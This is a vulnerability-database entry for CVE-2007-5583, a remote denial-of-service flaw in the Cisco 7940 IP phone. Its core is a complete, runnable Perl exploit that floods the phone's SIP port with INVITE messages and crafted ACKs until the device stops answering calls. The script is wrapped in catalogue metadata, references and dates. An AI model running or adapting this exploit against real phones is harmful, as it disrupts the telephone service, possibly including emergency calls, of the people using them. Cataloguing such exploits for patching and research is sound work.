ID
VAR-E-200712-0306
CVE
| cve_id: | CVE-2007-5583 | Trust: 1.9 |
EDB ID
4692
TITLE
Cisco Phone 7940 - Remote Denial of Service - Hardware dos Exploit
Trust: 0.6
DESCRIPTION
Cisco Phone 7940 - Remote Denial of Service. CVE-40189CVE-2007-5583 . dos exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | cisco | model: | phone | scope: | eq | version: | 7940 | Trust: 1.6 |
| vendor: | cisco | model: | ip phone | scope: | eq | version: | 7940 | Trust: 0.3 |
EXPLOIT
#!/usr/bin/perl
###############################
# Vulnerabily discovered using KiF ~ Kiph
#
# Authors:
# Humberto J. Abdelnur (Ph.D Student)
# Radu State (Ph.D)
# Olivier Festor (Ph.D)
#
# Madynes Team, LORIA - INRIA Lorraine
# http://madynes.loria.fr
###############################
use IO::Socket::INET;
use String::Random;
die "Usage $0 <targetIP> <targetUser> <attackerIP> <attackerUser>"
unless ($ARGV[3]);
$targetUser = $ARGV[1];
$targetIP = $ARGV[0];
$attackerUser = $ARGV[3];
$attackerIP= $ARGV[2];
$socket=new IO::Socket::INET->new(
Proto=>'udp',
PeerPort=>5060,
PeerAddr=>$targetIP,
LocalPort=>5060);
$foo = new String::Random;
$flag = 0;
@calls;
$threads = 0;
while ($flag == 0){
$callid= " " . $foo->randpattern("CCCnccnC") ."\@$attackerIP";
$cseq = $foo->randregex('\d\d\d\d');
$msg = "INVITE sip:$targetIP SIP/2.0\r
Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r
From: <sip:$attackerUser\@$attackerIP>;tag=1\r
To: <sip:$targetUser\@$targetIP>\r
Call-ID:$callid\r
CSeq: $cseq INVITE\r
Max-Forwards: 70\r
Contact: <sip:$attackerUser\@$attackerIP>\r
Allow: INVITE, ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE, NOTIFY,
MESSAGE\r
Content-Length: 0\r
\r
";
$socket->send($msg);
$socket->recv($text,1024,0);
if ($text =~ /^SIP\/2.0 100(.\r\n)*/ ){
push(@calls, $callid);
sleep(1);
}elsif ($text =~ /^SIP\/2.0 486(.\r\n)*/ ){
if ($thread == 0){
$thread = scalar(@calls);
}
while (scalar(@calls) ge $thread){
$toTag = $cseq= $callid= $text;
$toTag =~ s/^(.*\r\n)*(To|t):(.*?>)(;.*?)?\r\n(.*\r\n)*/\4/;
$callid =~ s/^(.*\r\n)*Call-ID:(.*)\r\n(.*\r\n)*/\2/;
$cseq =~ s/^(.*\r\n)*CSeq: (.*?) (.*?)\r\n(.*\r\n)*/\2/;
$msg = "ACK sip:$targetIP SIP/2.0\r
Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r
From: <sip:$attackerUser\@$attackerIP>;tag=1\r
To: <sip:$targetUser\@$targetIP>$toTag\r
Call-ID:$callid\r
CSeq: $cseq ACK\r
Contact: <sip:$attackerUser\@$attackerIP>\r
Content-Length: 0\r
\r
";
$socket->send($msg);
$i= 0;
while ($i < scalar(@calls)){
if (@calls[$i] eq $callid){
delete @calls[$i];
}else{
$i += 1;
}
}
if (scalar(@calls) ge $thread){
$socket->recv($text,1024,0);
}
}
}
}
# milw0rm.com [2007-12-05]
Trust: 1.0
EXPLOIT LANGUAGE
pl
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Remote Denial of Service
Trust: 1.0
CREDITS
MADYNES
Trust: 0.6
EXTERNAL IDS
| db: | NVD | id: | CVE-2007-5583 | Trust: 1.9 |
| db: | EXPLOIT-DB | id: | 4692 | Trust: 1.6 |
| db: | EDBNET | id: | 29005 | Trust: 0.6 |
| db: | BID | id: | 26711 | Trust: 0.3 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2007-5583 | Trust: 1.6 |
| url: | https://www.exploit-db.com/exploits/4692/ | Trust: 0.6 |
| url: | http://lists.grok.org.uk/pipermail/full-disclosure/2007-december/058837.html | Trust: 0.3 |
| url: | http://www.cisco.com/en/us/products/hw/phones/ps379/index.html | Trust: 0.3 |
| url: | http://lists.virus.org/full-disclosure-0712/msg00195.html | Trust: 0.3 |
SOURCES
| db: | BID | id: | 26711 |
| db: | EXPLOIT-DB | id: | 4692 |
| db: | EDBNET | id: | 29005 |
LAST UPDATE DATE
2022-07-27T09:48:29.471000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 26711 | date: | 2007-12-11T03:52:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 26711 | date: | 2007-12-05T00:00:00 |
| db: | EXPLOIT-DB | id: | 4692 | date: | 2007-12-05T00:00:00 |
| db: | EDBNET | id: | 29005 | date: | 2007-12-05T00:00:00 |